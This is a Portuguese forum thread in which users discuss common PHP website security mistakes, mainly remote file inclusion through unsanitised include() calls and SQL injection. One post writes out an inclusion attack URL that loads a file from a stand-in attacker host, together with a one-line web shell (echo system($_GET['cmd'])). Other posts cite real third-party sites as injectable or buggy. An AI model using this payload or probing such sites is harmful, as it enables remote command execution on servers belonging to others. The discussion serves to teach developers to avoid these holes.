• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

Gurzi

Precisa-se de Este Artigo:!

10 mensagens neste tópico

Pessoal, alguem pode fazer um mega artigo, ou postar links sobre erros comuns quando se desenvolve um web site usando php que possa por em causa a segurança de um site ?

dando formas de entrar e formas de resolver esse problema por favor..

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Valeu  :P

Umas dúvidas que retirei dos artigos, onde vejo se o URL WRAPPER está activo ? e como é que as pessoas sabem se eu uso algo vulnerável ou não ?

eles por exemplo falam neste erro :

include("topo.php");

include ( $pagina );

include ("down.php");

sendo que o 2nd include está vulnerável, mas como é possivel a alguem ver o meu código ? só se eu o mostrar =D

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Pelo o input no teu site.. quando alguem acessar o teu site numa das páginas a url vai ter um link como por exemplo  http://www.teu-site.com/index.php?pagina=livros.php&id=xxx  ou então http://www.teu-site.com/index.php?pagina=livros&nome=xxx O que esta em bold ajuda o atacante a perceber que aquilo é o include de uma pagina...

$pagina = $_GET['pagina'];

include( $pagina ); ou include( $pagina .".php" );

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

claro... mas isso é obvio... por exemplo:

Tens uma pagina em que para mudares de secções utilizas isso, http://www.gurzi.com/index.php?include=lol.php

Ai dá logo para ver a forma que tu usas :P

E nestas coisas da segurança é mais por tentativa e erro e esse erro deve ser logo dos primeiros :)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

claro... mas isso é obvio... por exemplo:

Tens uma pagina em que para mudares de secções utilizas isso, http://www.gurzi.com/index.php?include=lol.php

Ai dá logo para ver a forma que tu usas :P

E nestas coisas da segurança é mais por tentativa e erro e esse erro deve ser logo dos primeiros :)

Yep os erros dizem muita coisa ao atacante... tens aqui um exemplo de um erro que diz muita coisa http://www.eticanatv.org.br/pagina.php?id_pag=22%20SHOW%20TABLES;  "Erro no query" isso mostra ao atacante que esta a ser executado um query a SQL apartir do input da url e o atacante tenta fazer uma SQL Injection ou seja executar querys na SQL apartir da url e pode até descrobrir as passwords ou apagar as tabelas da base de dados etc... Tem que se ter muito cuidado.

EDIT: http://laboratoriopop.uol.com.br/pagina.php?abrir=texto_colunista.php&idcolunista=32 < esse site já tem uma bug

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

kingless: por acaso esse site está bastante mal feito mas se a version do php fosse mais antiga estava já offline :P

Não consegues assessar a files doutro servidor e tem as magic_quotes=on :P

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

kingless: por acaso esse site está bastante mal feito mas se a version do php fosse mais antiga estava já offline :P

Não consegues assessar a files doutro servidor e tem as magic_quotes=on :P

Consigo... O meu servidor (local) tem magic_quotes = on e eu consigo acessar as files apartir da url (criei uma bug e fiz um teste agora)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

mas e se o gajo usar $_POST ?

já não aparece no link...

mostra isso do bug, para eu perceber sff, ou se for grave, manda pm , abraço

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

$_POST só é utilizado em formularios, e os links utilizam $_GET e $_REQUEST

$minha_pagina = $_REQUEST['pagina'];

include( ' $minha_pagina ' );

O atacante só precisa de escrever isso na url

http://www.teu-site.com/index.php?pagina=http://www.atacante.com/ficheiro.txt?&cmd=id

No site do atacante o ficheiro.txt tem o seguinte código

echo system( $_GET['cmd'] );

Este código executa comandos no servidor do site vulneravel...  o include( " $minha_pagina " ); vai incluir o site do atacante no servidor e o site do atacante tem um código que o deixa o atacante executar comandos no servidor e assim ele pode conseguir atacar o site e o servidor.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora